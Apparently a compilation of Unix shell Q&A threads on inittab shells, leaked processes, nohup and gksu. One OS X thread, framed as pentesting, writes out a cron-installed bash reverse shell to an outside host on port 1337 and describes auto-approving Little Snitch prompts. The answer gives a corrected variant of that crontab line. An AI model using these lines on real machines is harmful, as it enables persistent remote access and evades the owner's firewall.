How to start a Linux shell the same way /etc/inittab does - bash

We used to have two entries in our /etc/inittab:
::sysinit:/etc/init.d/rcS
ttyS0::respawn:-/bin/sh
rcS is a shell script which normally starts our application. In a special case we called "return" to terminate it, which apparently let the /bin/sh entry take over the tty: we got a shell prompt where we could do some maintenance.
Now the inittab looks like this:
::once:/etc/init.d/rcS
We now start the shell by executing "/bin/bash -i" in the rcS script, as we don't want to always run a second shell (due to memory constraints) which is normally never used.
But the created bash doesn't feature job control, which is very limiting.
So my question is: can I create a shell (and maybe terminate the rcS script) the same way the init process did in our previous solution, so that I again get a shell with job control?

This depends on exactly what OS you are running. Here is an example which works on RHEL/CentOS.
6:2345:respawn:/sbin/mingetty --autologin root tty6
Here is what someone else did for a similar trick.
openvt -f -c 12 -w -- sh -c "unicode_start; echo -e '$NORPT'; exec $LOGINSH" >/dev/tty1
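For the embedded setup described in the question, a commonly used alternative (a hedged sketch, not taken from the answers above) is to start the maintenance shell from rcS in its own session, so that it can acquire the serial port as its controlling terminal; without a controlling terminal bash disables job control. The device name /dev/ttyS0 is assumed from the original inittab entry:
# sketch: start a maintenance shell with job control from rcS
# setsid creates a new session; opening /dev/ttyS0 first makes it the
# controlling terminal, which is what bash needs for job control
setsid sh -c 'exec /bin/bash </dev/ttyS0 >/dev/ttyS0 2>&1'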

Related

shell: clean up leaked background processes which hang due to shared stdout/stderr

I need to run essentially arbitrary commands on a (remote) shell in ephemeral containers/VMs for a test execution engine. Sometimes these leak background processes which then cause the entire command to hang. This can be boiled down to this simple command:
$ sh -c 'sleep 30 & echo payload'
payload
$
Here the backgrounded sleep 30 plays the role of a leaked process (which in reality will be something like dbus-daemon) and the echo is the actual thing I want to run. The sleep 30 & echo payload should be considered as an atomic opaque example command here.
The above command is fine and returns immediately as the shell's and also sleep's stdout/stderr are a PTY. However, when capturing the output of the command to a pipe/file (a test runner wants to save everything into a log, after all), the whole command hangs:
$ sh -c 'sleep 30 & echo payload' | cat
payload
# ... does not return to the shell (until the sleep finishes)
Now, this could be fixed with some rather ridiculously complicated shell magic which determines the FDs of stdout/err from /proc/$$/fd/{1,2}, iterating over ls /proc/[0-9]*/fd/* and killing every process which also has the same stdout/stderr. But this involves a lot of brittle shell code and expensive shell string comparisons.
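Purely for illustration, a hypothetical sketch of that brittle approach (the variable names are mine, not the original poster's) might look like:
# kill every other process whose stdout points at the same pipe as ours
my_out=$(readlink "/proc/$$/fd/1")
for fd in /proc/[0-9]*/fd/1; do
    pid=${fd#/proc/}; pid=${pid%%/*}
    [ "$pid" = "$$" ] && continue
    [ "$(readlink "$fd" 2>/dev/null)" = "$my_out" ] && kill "$pid" 2>/dev/null
done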
Is there a way to clean up these leaked background processes in a more elegant and simpler way? setsid does not help:
$ sh -c 'setsid -w sh -c "sleep 30 & echo payload"' | cat
payload
# hangs...
Note that process groups/sessions and killing them wholesale isn't sufficient as leaked processes (like dbus-daemon) often setsid themselves.
P.S. I can only assume POSIX shell or bash in these environments; no Python, Perl, etc.
Thank you in advance!
We had this problem with parallel tests in Launchpad. The simplest solution we had then - which worked well - was just to make sure that no processes share stdout/stdin/stderr (except ones where you actually want to hang if they haven't finished - e.g. the test workers themselves).
Hmm, having re-read this I cannot give you the solution you are after (use systemd to kill them). What we came up with is to simply ignore the processes but reliably not hang when the single process we were waiting for is done. Note that this is distinctly different from the pipes getting closed.
Another option, not perfect but useful, is to become a local reaper with prctl(2) and PR_SET_CHILD_SUBREAPER. This will allow you to become the parent of all the processes that would otherwise reparent to init. With this arrangement you could try to kill all the processes that have you as their ppid. This is terrible, but it's the next best thing to using cgroups.
But note that unless you are running this helper as root, you will find that practical testing might spawn some setuid thing that will lurk and won't be killable. It's an annoying problem, really.
Use script -qfc instead of sh -c.
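Assuming the util-linux version of script(1), a minimal sketch of that suggestion looks like this; script runs the command on a freshly allocated pseudo-terminal, so the leaked sleep inherits the pty rather than the pipe (the /dev/null argument simply discards the typescript file):
$ script -qfc 'sleep 30 & echo payload' /dev/null | cat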

Running a script in PowerBroker

I'm trying to script my commands that are run inside the pbrun shell. I've tried executing through a normal script, but that doesn't work because, to my understanding, pbrun is executed in its own subshell, making it hard, if not impossible, to pass commands to.
The only solution I can think of that might work is an input/output text processor that listens to the terminal and responds accordingly.
I was able to send commands to the standard input of pbrun:
echo 'echo $HOSTNAME' | pbrun bash
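If several commands are needed, a here-document can be fed to pbrun in the same way (a sketch that assumes pbrun keeps passing stdin through to the spawned bash, as above):
pbrun bash <<'EOF'
echo $HOSTNAME
id
EOF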

How to run shell script on VM indefinitely?

I have a VM on which I want a script running indefinitely. The server is always running, but I want the script to keep running after I log out. How would I go about doing that? By creating a cron job?
In general the following steps are sufficient to convince most Unix shells that the process you're launching should not depend on the continued existence of the shell:
run the command under nohup
run the command in the background
redirect all file descriptors that normally point to the terminal to other locations
So, if you want to run command-name, you should do it like so:
nohup command-name >/dev/null 2>/dev/null </dev/null &
This tells the process that will execute command-name to send all stdout and stderr to nowhere (instead of to your terminal) and also to read stdin from nowhere (instead of from your terminal). Of course if you actually have locations to write to/read from, you can certainly use those instead -- anything except the terminal is fine:
nohup command-name >outputFile 2>errorFile <inputFile &
See also the answer in Petur's comment, which discusses this issue a fair bit.
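As a bash-specific aside (my addition, not part of the answer above): if the job was started from an interactive bash session without nohup, it can still be detached after the fact with disown:
command-name >outputFile 2>errorFile </dev/null &
disown -h    # mark the current job so bash does not send it SIGHUP on logout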

OS X: cron job invokes bash but process run is 'sh'

I'm working on a pentesting project in which I want to open a reverse shell. I have a device that can trigger Little Snitch and then set it to allow outbound connections for certain processes. It does this by issuing a reverse shell command and, when the LS window pops up, acts as a keyboard to tell LS to always allow this type of connection. I can successfully do this for Bash, Perl, Python and Curl. The device also installs a cron job which contains a one-line reverse shell using bash.
But here's the problem...
The first time the cron job runs, Little Snitch still gets triggered because it has seen an outbound connection from 'sh' - not 'bash'. Yet the command definitely calls bash. The cron job is:
*/5 * * * * /bin/bash -i >& /dev/tcp/connect.blogsite.org/1337 0>&1 &
Subsequent connections are either from bash or sh - I haven't yet detected a pattern.
I've tried triggering LS in the original setup by using /bin/sh, but at that stage it still gets interpreted (i.e., is seen by LS) as bash, not sh (in OS X they are essentially the same thing, with slightly different behaviours depending on how they are invoked).
Any thoughts about how I can stop OS X using sh rather than bash in the cron job? Or, alternatively, how I can invoke sh rather than bash? (Like I said, /bin/sh doesn't do it!)
The command string is /bin/bash -i >& /dev/tcp/connect.blogsite.org/1337 0>&1 &. Cron needs to invoke this command. It doesn't parse the command string itself to learn that the first "word" is /bin/bash and then execute /bin/bash, passing it the rest of the arguments. (Among other things, not all parts of the command are arguments.)
Instead, it invokes /bin/sh with a first argument of -c and the second argument being your command string. That's just the generic way to run a command string.
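In other words, for the crontab line above, what cron effectively executes is something like:
/bin/sh -c '/bin/bash -i >& /dev/tcp/connect.blogsite.org/1337 0>&1 &'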
Then, /bin/sh interprets the command string. Part of the command is redirection. This is not done by the program that the command launches. It is done by the shell which will launch that program. That is, the instance of /bin/sh has to set up the file descriptors for the child process it's going to launch prior to launching that child process.
So, /bin/sh opens /dev/tcp/connect.blogsite.org/1337. It then passes that file descriptor to the child process it launches as descriptors 0, 1, and 2. (It could do this using fork() and dup2() before execve(), or it could do it all using posix_spawn() with appropriate file actions.)
The ultimate /bin/bash process doesn't open its own input or output. It just inherits them and, presumably, goes on to use them.
You could fix this by using yet another level of indirection in your command string. Basically, invoke /bin/bash with -c and its own command string. Like so:
*/5 * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/connect.blogsite.org/1337 0>&1 &'
So, the initial instance of /bin/sh won't open the file. It will simply spawn an instance of /bin/bash with arguments -c and the command string. That first instance of /bin/bash will interpret the command string, open the file in order to carry out the redirection directives, and then spawn a second instance of /bin/bash which will inherit those file descriptors.
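Alternatively (my suggestion, not part of the answer above), most cron implementations, including the one on OS X, let you choose the shell used to interpret command strings by setting SHELL at the top of the crontab, so the command string is handed to bash instead of sh:
SHELL=/bin/bash
*/5 * * * * /bin/bash -i >& /dev/tcp/connect.blogsite.org/1337 0>&1 &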

Execute one command after another one finishes under gksu

I'm trying to have a desktop shortcut that executes one command after another, without a script (I'm just wondering if that is possible). The first command requires root privileges, so I use gksu on Ubuntu; after I have finished typing my password correctly, I want the second command to run a file. I have this command:
xterm -e "gksu cp /opt/Popcorn-Time/backup/* /opt/Popcorn-Time; /opt/Popcorn-Time/Popcorn-Time"
But Popcorn-Time opens without waiting for me to finish typing my password (correctly). I want to do this without a separate script, if possible.
How should I do this?
EDIT: Ah! I see what is going on now: you've all been helping me make Popcorn-Time wait for gksu to finish, but Popcorn-Time isn't going to run without the files in backup, and those are a bit heavy (7 MB total), so it takes a moment for them to finish copying; Popcorn-Time is already open by the time the files are copied. Is there a way to make Popcorn-Time wait for the cp command to finish?
I also changed my command above to what I have now.
EDIT #2: Nothing I said up to now is relevant, as the problem with Popcorn-Time wasn't what I thought: I didn't need to copy the files over, I just needed to run it as root for it to work. Thanks to everyone who tried to help.
Thanks.
If you want the /opt/popcorntime/Popcorn-Time command to wait until the first command finishes, you can separate the commands with && so that the second only executes on successful completion of the first (the two commands then form an AND list). E.g.:
command1 && command2
With gksu in order to run multiple commands with only a single password entry, you will need:
gksu -- bash -c 'command1 && command2'
In your case:
gnome-terminal -e gksu -- bash -c "cp /opt/popcorntime/backup/* /opt/popcorntime && /opt/popcorntime/Popcorn-Time"
(you may have to adjust quoting to fit your expansion needs)
You can use the or operator in a similar fashion so that the second command only executes if the first fails. E.g.:
command1 || command2
In a console you would do:
gksu cp /opt/popcorntime/backup/* /opt/popcorntime; /opt/popcorntime/Popcorn-Time
In order to use it as Exec in the .desktop file wrap it like this:
bash -e "gksu cp /opt/popcorntime/backup/* /opt/popcorntime; /opt/popcorntime/Popcorn-Time"
The problem is that gnome-terminal is only seeing the gksu command as the value to the -e argument and not the Popcorn-Time command.
gnome-terminal forks and returns immediately and so Popcorn-Time runs immediately.
The solution is to quote the entire command string (both commands) so they are (combined) the single argument to -e.
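So a corrected invocation, roughly (a sketch using the paths from the answer above; quoting may still need adjusting for your setup), would be:
gnome-terminal -e "gksu -- bash -c 'cp /opt/popcorntime/backup/* /opt/popcorntime && /opt/popcorntime/Popcorn-Time'"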
